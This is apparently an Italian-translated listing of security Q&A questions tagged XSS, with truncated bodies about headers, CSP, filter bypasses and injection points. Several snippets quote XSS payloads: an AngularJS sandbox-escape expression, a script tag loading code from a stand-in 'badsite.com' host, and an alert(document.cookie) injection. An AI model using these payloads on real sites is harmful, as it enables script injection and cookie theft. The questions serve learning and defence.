Domande con tag 'xss'

0
risposte

"Errore meccanismo di protezione (CWE ID 693)

Dopo la scansione di sicurezza, stiamo riscontrando il problema del meccanismo di protezione (CWE ID 693) nelle nostre applicazione. La nostra intestazione attuale è impostata come indicato di seguito - Server: Apache X-Frame-Options: SAM...
posta 19.06.2018 - 10:54
2
risposte

Esistono vulnerabilità XSS durante l'anteprima delle immagini prima di caricarle?

Ho scritto uno strumento JQuery per visualizzare l'anteprima delle immagini prima del caricamento. L'utente A fa clic sul pulsante Esplora per selezionare un'immagine lo seleziona un evento di cambiamento mostra l'immagine Se l'utente...
posta 22.06.2018 - 16:18
0
risposte

Intestazione HTTP: intervallo: byte = XXX e possibile XSS?

Attualmente sto sperimentando l'intestazione HTTP "Range: bytes = XXX". Indipendentemente dalla possibilità di usarlo per il cosiddetto attacco DoS "Apache Killer" (versione Apache senza patch, ecc.), È possibile utilizzarlo erroneamente per un...
posta 08.05.2017 - 15:12
0
risposte

XSS senza '= [chiuso]

Lo sviluppatore filtra i caratteri ' , < , > e = e la vulnerabilità è qualcosa del tipo: Ho anche provato le codifiche URL come %3c , %0a , %3e , %0a , %3d , %0a , %27 e %0a ma non fun...
posta 18.11.2017 - 14:39
1
risposta

Rottura della stringa XS JS

Ho cercato le vulnerabilità XSS nel sito web di un amico (blackbox) e in una delle pagine prende il tuo input e lo inserisce in uno script js, window.location="[INPUT]"; Non potevo interrompere le virgolette perché sono state sostituite co...
posta 16.10.2016 - 14:07
0
risposte

Come convalidare i dati di Excel per la protezione contro XSS?

La mia applicazione sta costruendo dinamicamente un URL sorgente e quindi scrive il file di risorse (Excel) direttamente nella risposta. L'URL viene letto da un file delle proprietà, in base all'ambiente dell'applicazione. (Non correlato all'inp...
posta 02.12.2015 - 18:50
0
risposte

XSS angolare non valutato

Usando una versione precedente di AngularJS: 1.2.21 dell'esempio, ci sono alcuni giochi che possono generare un XSS. {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}...
posta 20.05.2016 - 15:25
3
risposte

Cos'è una pratica più sicura? Hosting da CDN o sito Web principale

C'è stato un lungo dibattito sulla modellazione CSP, ho un'applicazione Web e uso JQuery in esso, per cui uso il sito principale di JQuery http://code.jquery.com/jquery-x.yy.z.min.js per ospitarlo sul mio sito per funzionare, so che i CDN p...
posta 22.07.2016 - 10:00
0
risposte

Quale percentuale di attacchi XSS memorizzati utilizza JavaScript esterno?

Quale percentuale di attacchi XSS utilizza JavaScript esterno. Ad esempio: <script src="http://badsite.com/maliciouscode.js"></script> Invece di: <script>alert(document.cookie);</script> Qualsiasi fonte sarebbe...
posta 20.09.2015 - 23:13
0
risposte

Il browser forzato non codifica i caratteri specifici dell'URL? [duplicare]

Cerco di far funzionare XSS in una richiesta GET, ma funziona solo all'interno di BURP perché posso inviare ad esempio > come stringa non codificata URL. Appena lo provo nel browser, non è più possibile perché il browser codifica >...
posta 29.02.2016 - 14:58